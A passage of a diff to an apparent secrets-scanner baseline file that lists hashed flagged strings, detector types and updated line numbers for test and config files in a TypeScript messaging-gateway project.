"is_verified": false, - "line_number": 57 + "line_number": 190 } ], "src/commands/onboard-auth.config-minimax.ts": [ @@ -12001,104 +13042,53 @@ "filename": "src/commands/onboard-auth.config-minimax.ts", "hashed_secret": "16c249e04e2be318050cb883c40137361c0c7209", "is_verified": false, - "line_number": 36 + "line_number": 37 }, { "type": "Secret Keyword", "filename": "src/commands/onboard-auth.config-minimax.ts", "hashed_secret": "ddcb713196b974770575a9bea5a4e7d46361f8e9", "is_verified": false, - "line_number": 78 + "line_number": 79 } ], - "src/commands/onboard-auth.e2e.test.ts": [ + "src/commands/onboard-auth.credentials.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/onboard-auth.e2e.test.ts", - "hashed_secret": "e184b402822abc549b37689c84e8e0e33c39a1f1", + "filename": "src/commands/onboard-auth.credentials.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", "is_verified": false, - "line_number": 272 - } - ], - "src/commands/onboard-custom.e2e.test.ts": [ - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-custom.e2e.test.ts", - "hashed_secret": "62e6748c6bb4c4a0f785a28cdd7d41ef212c0091", - "is_verified": false, - "line_number": 238 - } - ], - "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts": [ - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "fcdd655b11f33ba4327695084a347b2ba192976c", - "is_verified": false, - "line_number": 153 + "line_number": 97 }, { "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "07a6b9cec637c806195e8aa7e5c0851ab03dc35e", + "filename": "src/commands/onboard-auth.credentials.test.ts", + "hashed_secret": "3fabe94b84be76552a40fab6d3284697b136ea23", + "is_verified": false, + "line_number": 139 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/onboard-auth.credentials.test.ts", + "hashed_secret": "aec738f7a0d1056bee31567d522e7191a13ce31a", + "is_verified": false, + "line_number": 190 + }, + { + "type": "Secret Keyword", + "filename": "src/commands/onboard-auth.credentials.test.ts", + "hashed_secret": "9705dbfd5f922106b199746632af2b66b02c3f0a", "is_verified": false, "line_number": 191 - }, + } + ], + "src/commands/onboard-auth.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "77e991e9f56e6fa4ed1a908208048421f1214c07", + "filename": "src/commands/onboard-auth.test.ts", + "hashed_secret": "e184b402822abc549b37689c84e8e0e33c39a1f1", "is_verified": false, - "line_number": 234 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "65547299f940eca3dc839f3eac85e8a78a6deb05", - "is_verified": false, - "line_number": 282 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "2833d098c110602e4c8d577fbfdb423a9ffd58e9", - "is_verified": false, - "line_number": 304 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "266e955b27b5fc2c2f532e446f2e71c3667a4cd9", - "is_verified": false, - "line_number": 338 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "995b80728ee01edb90ddfed07870bbab405df19f", - "is_verified": false, - "line_number": 366 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "b65888424ecafcc98bfd803b24817e4dadf821f8", - "is_verified": false, - "line_number": 383 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "62e6748c6bb4c4a0f785a28cdd7d41ef212c0091", - "is_verified": false, - "line_number": 402 - }, - { - "type": "Secret Keyword", - "filename": "src/commands/onboard-non-interactive.provider-auth.e2e.test.ts", - "hashed_secret": "8818d3b7c102fd6775af9e1390e5ed3a128473fb", - "is_verified": false, - "line_number": 447 + "line_number": 423 } ], "src/commands/onboard-non-interactive/api-keys.ts": [ @@ -12107,7 +13097,7 @@ "filename": "src/commands/onboard-non-interactive/api-keys.ts", "hashed_secret": "112f3a99b283a4e1788dedd8e0e5d35375c33747", "is_verified": false, - "line_number": 11 + "line_number": 12 } ], "src/commands/status.update.test.ts": [ @@ -12128,13 +13118,13 @@ "line_number": 60 } ], - "src/commands/zai-endpoint-detect.e2e.test.ts": [ + "src/commands/zai-endpoint-detect.test.ts": [ { "type": "Secret Keyword", - "filename": "src/commands/zai-endpoint-detect.e2e.test.ts", + "filename": "src/commands/zai-endpoint-detect.test.ts", "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 24 + "line_number": 61 } ], "src/config/config-misc.test.ts": [ @@ -12143,7 +13133,7 @@ "filename": "src/config/config-misc.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 62 + "line_number": 102 } ], "src/config/config.env-vars.test.ts": [ @@ -12187,20 +13177,71 @@ "line_number": 33 } ], + "src/config/config.web-search-provider.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 19 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "a704b0feaf024ae73cda6859104dd323bc36b451", + "is_verified": false, + "line_number": 78 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "6984b2d1edb45c9ba5de8d29e9cd9a2613c6a170", + "is_verified": false, + "line_number": 83 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "bfe8fe037d4fe1aa6c0aeecf94efe2ebc265c6f8", + "is_verified": false, + "line_number": 88 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "4ee210c6480582752ad7f74c74bd63a3d4531e51", + "is_verified": false, + "line_number": 93 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "6d166fccc1c1a5193f7f7397705c84a184d68c0e", + "is_verified": false, + "line_number": 98 + }, + { + "type": "Secret Keyword", + "filename": "src/config/config.web-search-provider.test.ts", + "hashed_secret": "0f7f0fad47a1470a44be65dac2b848a99e28302c", + "is_verified": false, + "line_number": 108 + } + ], "src/config/env-preserve-io.test.ts": [ { "type": "Secret Keyword", "filename": "src/config/env-preserve-io.test.ts", "hashed_secret": "85639f0560fd9bf8704f52e01c5e764c9ed5a6aa", "is_verified": false, - "line_number": 59 + "line_number": 31 }, { "type": "Secret Keyword", "filename": "src/config/env-preserve-io.test.ts", "hashed_secret": "996650087ab48bdb1ca80f0842c97d4fbb6f1c71", "is_verified": false, - "line_number": 86 + "line_number": 75 } ], "src/config/env-preserve.test.ts": [ @@ -12239,28 +13280,37 @@ "filename": "src/config/env-substitution.test.ts", "hashed_secret": "f2b14f68eb995facb3a1c35287b778d5bd785511", "is_verified": false, - "line_number": 37 + "line_number": 80 }, { "type": "Secret Keyword", "filename": "src/config/env-substitution.test.ts", "hashed_secret": "ec417f567082612f8fd6afafe1abcab831fca840", "is_verified": false, - "line_number": 68 + "line_number": 100 }, { "type": "Secret Keyword", "filename": "src/config/env-substitution.test.ts", "hashed_secret": "520bd69c3eb1646d9a78181ecb4c90c51fdf428d", "is_verified": false, - "line_number": 69 + "line_number": 101 }, { "type": "Secret Keyword", "filename": "src/config/env-substitution.test.ts", "hashed_secret": "f136444bf9b3d01a9f9b772b80ac6bf7b6a43ef0", "is_verified": false, - "line_number": 227 + "line_number": 282 + } + ], + "src/config/io.runtime-snapshot-write.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/config/io.runtime-snapshot-write.test.ts", + "hashed_secret": "c7106700045d8a274b6702325ecf9bcb60d42318", + "is_verified": false, + "line_number": 34 } ], "src/config/io.write-config.test.ts": [ @@ -12269,7 +13319,7 @@ "filename": "src/config/io.write-config.test.ts", "hashed_secret": "13951588fd3325e25ed1e3b116d7009fb221c85e", "is_verified": false, - "line_number": 65 + "line_number": 289 } ], "src/config/model-alias-defaults.test.ts": [ @@ -12278,107 +13328,163 @@ "filename": "src/config/model-alias-defaults.test.ts", "hashed_secret": "e9a5f12a8ecbb3eb46eca5096b5c52aa5e7c9fdd", "is_verified": false, - "line_number": 66 - } - ], - "src/config/redact-snapshot.test.ts": [ - { - "type": "Base64 High Entropy String", - "filename": "src/config/redact-snapshot.test.ts", - "hashed_secret": "3732e17b2d11ed6c64fef02c341958007af154e7", - "is_verified": false, - "line_number": 77 + "line_number": 13 }, { "type": "Secret Keyword", - "filename": "src/config/redact-snapshot.test.ts", - "hashed_secret": "3732e17b2d11ed6c64fef02c341958007af154e7", + "filename": "src/config/model-alias-defaults.test.ts", + "hashed_secret": "fa9144b340ea7886885669e2e7a808c86ee14a07", "is_verified": false, - "line_number": 77 - }, + "line_number": 114 + } + ], + "src/config/redact-snapshot.test.ts": [ { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "7f413afd37447cd321d79286be0f58d7a9875d9b", "is_verified": false, - "line_number": 89 - }, - { - "type": "Secret Keyword", - "filename": "src/config/redact-snapshot.test.ts", - "hashed_secret": "c21afa950dee2a70f3e0f6ffdfbc87f8edb90262", - "is_verified": false, - "line_number": 99 - }, - { - "type": "Secret Keyword", - "filename": "src/config/redact-snapshot.test.ts", - "hashed_secret": "83a9937c6de261ffda22304834f30fe6c8f97926", - "is_verified": false, - "line_number": 110 - }, - { - "type": "Secret Keyword", - "filename": "src/config/redact-snapshot.test.ts", - "hashed_secret": "87ac76dfc9cba93bead43c191e31bd099a97cc11", - "is_verified": false, - "line_number": 198 + "line_number": 78 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "abb1aabcd0e49019c2873944a40671a80ccd64c7", "is_verified": false, - "line_number": 309 + "line_number": 84 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "83a9937c6de261ffda22304834f30fe6c8f97926", + "is_verified": false, + "line_number": 88 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "c21afa950dee2a70f3e0f6ffdfbc87f8edb90262", + "is_verified": false, + "line_number": 91 + }, + { + "type": "Base64 High Entropy String", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "3732e17b2d11ed6c64fef02c341958007af154e7", + "is_verified": false, + "line_number": 95 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "3732e17b2d11ed6c64fef02c341958007af154e7", + "is_verified": false, + "line_number": 95 + }, + { + "type": "Private Key", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "1348b145fa1a555461c1b790a2f66614781091e9", + "is_verified": false, + "line_number": 123 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "87ac76dfc9cba93bead43c191e31bd099a97cc11", + "is_verified": false, + "line_number": 227 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "939bb46a04c3640c8c427e92b1b557e882e2d2a0", + "is_verified": false, + "line_number": 262 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "7505d64a54e061b7acd54ccd58b49dc43500b635", + "is_verified": false, + "line_number": 302 }, { "type": "Base64 High Entropy String", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "8e22880b4e96bab354e1da6c91d2f58dabde3555", "is_verified": false, - "line_number": 321 + "line_number": 397 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "8e22880b4e96bab354e1da6c91d2f58dabde3555", "is_verified": false, - "line_number": 321 + "line_number": 397 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "a9c732e05044a08c760cce7f6d142cd0d35a19e5", "is_verified": false, - "line_number": 375 + "line_number": 455 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "50843dd5651cfafbe7c5611c1eed195c63e6e3fd", "is_verified": false, - "line_number": 691 + "line_number": 771 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "22edfa62d61f01fead87e40562f8c8a51caa2806", + "is_verified": false, + "line_number": 783 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "33e65bb7ffff7e05b434318409b212f8724bc961", + "is_verified": false, + "line_number": 806 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "dc2e131fd7ef4cf84345ad7f6c92c3d656051ede", + "is_verified": false, + "line_number": 831 + }, + { + "type": "Secret Keyword", + "filename": "src/config/redact-snapshot.test.ts", + "hashed_secret": "0834708d0ed84f1d023353afc867fb0a4e5ebfea", + "is_verified": false, + "line_number": 838 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "927e7cdedcb8f71af399a49fb90a381df8b8df28", "is_verified": false, - "line_number": 808 + "line_number": 1007 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "1996cc327bd39dad69cd8feb24250dafd51e7c08", "is_verified": false, - "line_number": 814 + "line_number": 1013 }, { "type": "Secret Keyword", "filename": "src/config/redact-snapshot.test.ts", "hashed_secret": "a5c0a65a4fa8874a486aa5072671927ceba82a90", "is_verified": false, - "line_number": 838 + "line_number": 1037 } ], "src/config/schema.help.ts": [ @@ -12387,21 +13493,14 @@ "filename": "src/config/schema.help.ts", "hashed_secret": "9f4cda226d3868676ac7f86f59e4190eb94bd208", "is_verified": false, - "line_number": 109 + "line_number": 649 }, { "type": "Secret Keyword", "filename": "src/config/schema.help.ts", "hashed_secret": "01822c8bbf6a8b136944b14182cb885100ec2eae", "is_verified": false, - "line_number": 130 - }, - { - "type": "Secret Keyword", - "filename": "src/config/schema.help.ts", - "hashed_secret": "bb7dfd9746e660e4a4374951ec5938ef0e343255", - "is_verified": false, - "line_number": 187 + "line_number": 680 } ], "src/config/schema.irc.ts": [ @@ -12440,14 +13539,14 @@ "filename": "src/config/schema.labels.ts", "hashed_secret": "e73c9fcad85cd4eecc74181ec4bdb31064d68439", "is_verified": false, - "line_number": 104 + "line_number": 216 }, { "type": "Secret Keyword", "filename": "src/config/schema.labels.ts", "hashed_secret": "2eda7cd978f39eebec3bf03e4410a40e14167fff", "is_verified": false, - "line_number": 145 + "line_number": 324 } ], "src/config/slack-http-config.test.ts": [ @@ -12459,6 +13558,31 @@ "line_number": 10 } ], + "src/config/talk.normalize.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/config/talk.normalize.test.ts", + "hashed_secret": "dff6d4ff5dc357cf451d1855ab9cbda562645c9f", + "is_verified": false, + "line_number": 30 + }, + { + "type": "Secret Keyword", + "filename": "src/config/talk.normalize.test.ts", + "hashed_secret": "653d2545f6d16efa76ad7740bab466e175c4efd3", + "is_verified": false, + "line_number": 101 + } + ], + "src/config/telegram-webhook-port.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/config/telegram-webhook-port.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 10 + } + ], "src/config/telegram-webhook-secret.test.ts": [ { "type": "Secret Keyword", @@ -12468,13 +13592,20 @@ "line_number": 10 } ], - "src/docker-setup.test.ts": [ + "src/docker-setup.e2e.test.ts": [ { "type": "Base64 High Entropy String", - "filename": "src/docker-setup.test.ts", + "filename": "src/docker-setup.e2e.test.ts", "hashed_secret": "32ac33b537769e97787f70ef85576cc243fab934", "is_verified": false, - "line_number": 131 + "line_number": 178 + }, + { + "type": "Base64 High Entropy String", + "filename": "src/docker-setup.e2e.test.ts", + "hashed_secret": "299e5b3d10d301eb479c0b84b16d750cb799e274", + "is_verified": false, + "line_number": 250 } ], "src/gateway/auth-rate-limit.ts": [ @@ -12483,7 +13614,7 @@ "filename": "src/gateway/auth-rate-limit.ts", "hashed_secret": "76ed0a056aa77060de25754586440cff390791d0", "is_verified": false, - "line_number": 37 + "line_number": 39 } ], "src/gateway/auth.test.ts": [ @@ -12492,88 +13623,241 @@ "filename": "src/gateway/auth.test.ts", "hashed_secret": "db5543cd7440bbdc4c5aaf8aa363715c31dd5a27", "is_verified": false, - "line_number": 32 + "line_number": 95 }, { "type": "Secret Keyword", "filename": "src/gateway/auth.test.ts", "hashed_secret": "d51f846285cbc6d1dd76677a0fd588c8df44e506", "is_verified": false, - "line_number": 48 + "line_number": 112 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/auth.test.ts", + "hashed_secret": "052f076c732648ab32d2fcde9fe255319bfa0c7b", + "is_verified": false, + "line_number": 128 }, { "type": "Secret Keyword", "filename": "src/gateway/auth.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 95 + "line_number": 254 }, { "type": "Secret Keyword", "filename": "src/gateway/auth.test.ts", "hashed_secret": "a4b48a81cdab1e1a5dd37907d6c85ca1c61ddc7c", "is_verified": false, - "line_number": 103 + "line_number": 262 } ], "src/gateway/call.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/gateway/call.test.ts", + "hashed_secret": "2e07956ffc9bc4fd624064c40b7495c85d5f1467", + "is_verified": false, + "line_number": 90 + }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", "hashed_secret": "db5543cd7440bbdc4c5aaf8aa363715c31dd5a27", "is_verified": false, - "line_number": 357 + "line_number": 607 }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", "hashed_secret": "de1c41e8ece73f5d5c259bb37eccb59a542b91dc", "is_verified": false, - "line_number": 361 + "line_number": 611 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/call.test.ts", + "hashed_secret": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8", + "is_verified": false, + "line_number": 638 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/call.test.ts", + "hashed_secret": "ee977806d7286510da8b9a7492ba58e2484c0ecc", + "is_verified": false, + "line_number": 646 }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 398 + "line_number": 683 }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", "hashed_secret": "e493f561d90c6638c1f51c5a8a069c3b129b79ed", "is_verified": false, - "line_number": 408 - }, - { - "type": "Secret Keyword", - "filename": "src/gateway/call.test.ts", - "hashed_secret": "2e07956ffc9bc4fd624064c40b7495c85d5f1467", - "is_verified": false, - "line_number": 413 + "line_number": 690 }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", "hashed_secret": "bddc29032de580fb53b3a9a0357dd409086db800", "is_verified": false, - "line_number": 426 + "line_number": 704 }, { "type": "Secret Keyword", "filename": "src/gateway/call.test.ts", - "hashed_secret": "6255675480f681df08c1704b7b3cd2c49917f0e2", + "hashed_secret": "2e7d14ce1d0b584f112cca09f638557e42a2617b", "is_verified": false, - "line_number": 463 + "line_number": 724 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/call.test.ts", + "hashed_secret": "802c9dbd2953f682a244abc0ec00ad564ac0eb7d", + "is_verified": false, + "line_number": 869 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/call.test.ts", + "hashed_secret": "1e1ff291f3b48b7e5b54828396f264ba43379076", + "is_verified": false, + "line_number": 901 } ], - "src/gateway/client.e2e.test.ts": [ + "src/gateway/client.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/gateway/client.test.ts", + "hashed_secret": "2c35baf5aa803a12df64c64b97df0445c46aeb03", + "is_verified": false, + "line_number": 126 + } + ], + "src/gateway/client.watchdog.test.ts": [ { "type": "Private Key", - "filename": "src/gateway/client.e2e.test.ts", + "filename": "src/gateway/client.watchdog.test.ts", "hashed_secret": "1348b145fa1a555461c1b790a2f66614781091e9", "is_verified": false, - "line_number": 85 + "line_number": 89 + } + ], + "src/gateway/credential-precedence.parity.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/gateway/credential-precedence.parity.test.ts", + "hashed_secret": "db5543cd7440bbdc4c5aaf8aa363715c31dd5a27", + "is_verified": false, + "line_number": 24 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credential-precedence.parity.test.ts", + "hashed_secret": "de1c41e8ece73f5d5c259bb37eccb59a542b91dc", + "is_verified": false, + "line_number": 34 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credential-precedence.parity.test.ts", + "hashed_secret": "052f076c732648ab32d2fcde9fe255319bfa0c7b", + "is_verified": false, + "line_number": 80 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credential-precedence.parity.test.ts", + "hashed_secret": "1e1ff291f3b48b7e5b54828396f264ba43379076", + "is_verified": false, + "line_number": 99 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credential-precedence.parity.test.ts", + "hashed_secret": "d51f846285cbc6d1dd76677a0fd588c8df44e506", + "is_verified": false, + "line_number": 132 + } + ], + "src/gateway/credentials.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "052f076c732648ab32d2fcde9fe255319bfa0c7b", + "is_verified": false, + "line_number": 15 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "1e1ff291f3b48b7e5b54828396f264ba43379076", + "is_verified": false, + "line_number": 16 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "db5543cd7440bbdc4c5aaf8aa363715c31dd5a27", + "is_verified": false, + "line_number": 19 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "6255675480f681df08c1704b7b3cd2c49917f0e2", + "is_verified": false, + "line_number": 81 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "de1c41e8ece73f5d5c259bb37eccb59a542b91dc", + "is_verified": false, + "line_number": 227 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "e951da0670d747fb42c25e584913ced2a22df456", + "is_verified": false, + "line_number": 258 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "c4268595e9bc82fd8385d7f5c31cff96d677e31d", + "is_verified": false, + "line_number": 269 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "bc5f9ea9a906cf0641cf9e227b6b9ae3cdc9df59", + "is_verified": false, + "line_number": 285 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "d51f846285cbc6d1dd76677a0fd588c8df44e506", + "is_verified": false, + "line_number": 455 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/credentials.test.ts", + "hashed_secret": "60acdb59369429ffd0729487ec638eb0f7f12976", + "is_verified": false, + "line_number": 474 } ], "src/gateway/gateway-cli-backend.live.test.ts": [ @@ -12582,7 +13866,7 @@ "filename": "src/gateway/gateway-cli-backend.live.test.ts", "hashed_secret": "3e2fd4a90d5afbd27974730c4d6a9592fe300825", "is_verified": false, - "line_number": 38 + "line_number": 45 } ], "src/gateway/gateway-models.profiles.live.test.ts": [ @@ -12591,7 +13875,16 @@ "filename": "src/gateway/gateway-models.profiles.live.test.ts", "hashed_secret": "3e2fd4a90d5afbd27974730c4d6a9592fe300825", "is_verified": false, - "line_number": 242 + "line_number": 384 + } + ], + "src/gateway/server-methods/push.test.ts": [ + { + "type": "Private Key", + "filename": "src/gateway/server-methods/push.test.ts", + "hashed_secret": "1348b145fa1a555461c1b790a2f66614781091e9", + "is_verified": false, + "line_number": 81 } ], "src/gateway/server-methods/skills.update.normalizes-api-key.test.ts": [ @@ -12609,41 +13902,34 @@ "filename": "src/gateway/server-methods/talk.ts", "hashed_secret": "e478a5eeba4907d2f12a68761996b9de745d826d", "is_verified": false, - "line_number": 13 + "line_number": 14 } ], - "src/gateway/server.auth.e2e.test.ts": [ + "src/gateway/server.auth.control-ui.suite.ts": [ { "type": "Secret Keyword", - "filename": "src/gateway/server.auth.e2e.test.ts", + "filename": "src/gateway/server.auth.control-ui.suite.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 460 - }, - { - "type": "Secret Keyword", - "filename": "src/gateway/server.auth.e2e.test.ts", - "hashed_secret": "a4b48a81cdab1e1a5dd37907d6c85ca1c61ddc7c", - "is_verified": false, - "line_number": 478 + "line_number": 239 } ], - "src/gateway/server.skills-status.e2e.test.ts": [ + "src/gateway/server.skills-status.test.ts": [ { "type": "Secret Keyword", - "filename": "src/gateway/server.skills-status.e2e.test.ts", + "filename": "src/gateway/server.skills-status.test.ts", "hashed_secret": "1cc6bff0f84efb2d3ff4fa1347f3b2bc173aaff0", "is_verified": false, - "line_number": 13 + "line_number": 14 } ], - "src/gateway/server.talk-config.e2e.test.ts": [ + "src/gateway/server.talk-config.test.ts": [ { "type": "Secret Keyword", - "filename": "src/gateway/server.talk-config.e2e.test.ts", + "filename": "src/gateway/server.talk-config.test.ts", "hashed_secret": "3c310634864babb081f0b617c14bc34823d7e369", "is_verified": false, - "line_number": 13 + "line_number": 70 } ], "src/gateway/session-utils.test.ts": [ @@ -12652,7 +13938,37 @@ "filename": "src/gateway/session-utils.test.ts", "hashed_secret": "bb9a5d9483409d2c60b28268a0efcb93324d4cda", "is_verified": false, - "line_number": 280 + "line_number": 563 + } + ], + "src/gateway/startup-auth.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/gateway/startup-auth.test.ts", + "hashed_secret": "1951c80555441588e8707fa68a6084a91c8a114a", + "is_verified": false, + "line_number": 125 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/startup-auth.test.ts", + "hashed_secret": "0b75f28abf6b39a10d1398ce5a95e93a5cebbbda", + "is_verified": false, + "line_number": 255 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/startup-auth.test.ts", + "hashed_secret": "f1355ae408e2068355dad8f3a503c2eaedefc0c6", + "is_verified": false, + "line_number": 282 + }, + { + "type": "Secret Keyword", + "filename": "src/gateway/startup-auth.test.ts", + "hashed_secret": "1a91d62f7ca67399625a4368a6ab5d4a3baa6073", + "is_verified": false, + "line_number": 448 } ], "src/gateway/test-openai-responses-model.ts": [ @@ -12679,14 +13995,14 @@ "filename": "src/infra/env.test.ts", "hashed_secret": "df98a117ddabf85991b9fe0e268214dc0e1254dc", "is_verified": false, - "line_number": 9 + "line_number": 7 }, { "type": "Secret Keyword", "filename": "src/infra/env.test.ts", "hashed_secret": "6d811dc1f59a55ca1a3d38b5042a062b9f79e8ec", "is_verified": false, - "line_number": 30 + "line_number": 14 } ], "src/infra/outbound/message-action-runner.test.ts": [ @@ -12695,14 +14011,14 @@ "filename": "src/infra/outbound/message-action-runner.test.ts", "hashed_secret": "804ec071803318791b835cffd6e509c8d32239db", "is_verified": false, - "line_number": 129 + "line_number": 180 }, { "type": "Secret Keyword", "filename": "src/infra/outbound/message-action-runner.test.ts", "hashed_secret": "789cbe0407840b1c2041cb33452ff60f19bf58cc", "is_verified": false, - "line_number": 435 + "line_number": 529 } ], "src/infra/outbound/outbound.test.ts": [ @@ -12711,7 +14027,7 @@ "filename": "src/infra/outbound/outbound.test.ts", "hashed_secret": "804ec071803318791b835cffd6e509c8d32239db", "is_verified": false, - "line_number": 631 + "line_number": 850 } ], "src/infra/provider-usage.auth.normalizes-keys.test.ts": [ @@ -12720,21 +14036,30 @@ "filename": "src/infra/provider-usage.auth.normalizes-keys.test.ts", "hashed_secret": "45c7365e3b542cdb4fae6ec10c2ff149224d7656", "is_verified": false, - "line_number": 80 + "line_number": 123 }, { "type": "Secret Keyword", "filename": "src/infra/provider-usage.auth.normalizes-keys.test.ts", "hashed_secret": "b67074884ab7ef7c7a8cd6a3da9565d96c792248", "is_verified": false, - "line_number": 81 + "line_number": 124 }, { "type": "Secret Keyword", "filename": "src/infra/provider-usage.auth.normalizes-keys.test.ts", "hashed_secret": "d4d8027e64f9cf4180d3aecfe31ea409368022ee", "is_verified": false, - "line_number": 82 + "line_number": 125 + } + ], + "src/infra/push-apns.test.ts": [ + { + "type": "Private Key", + "filename": "src/infra/push-apns.test.ts", + "hashed_secret": "1348b145fa1a555461c1b790a2f66614781091e9", + "is_verified": false, + "line_number": 80 } ], "src/infra/shell-env.test.ts": [ @@ -12743,21 +14068,21 @@ "filename": "src/infra/shell-env.test.ts", "hashed_secret": "65c10dc3549fe07424148a8a4790a3341ecbc253", "is_verified": false, - "line_number": 26 + "line_number": 133 }, { "type": "Secret Keyword", "filename": "src/infra/shell-env.test.ts", "hashed_secret": "e013ffda590d2178607c16d11b1ea42f75ceb0e7", "is_verified": false, - "line_number": 58 + "line_number": 165 }, { "type": "Base64 High Entropy String", "filename": "src/infra/shell-env.test.ts", "hashed_secret": "be6ee9a6bf9f2dad84a5a67d6c0576a5bacc391e", "is_verified": false, - "line_number": 60 + "line_number": 167 } ], "src/line/accounts.test.ts": [ @@ -12789,7 +14114,14 @@ "filename": "src/line/bot-handlers.test.ts", "hashed_secret": 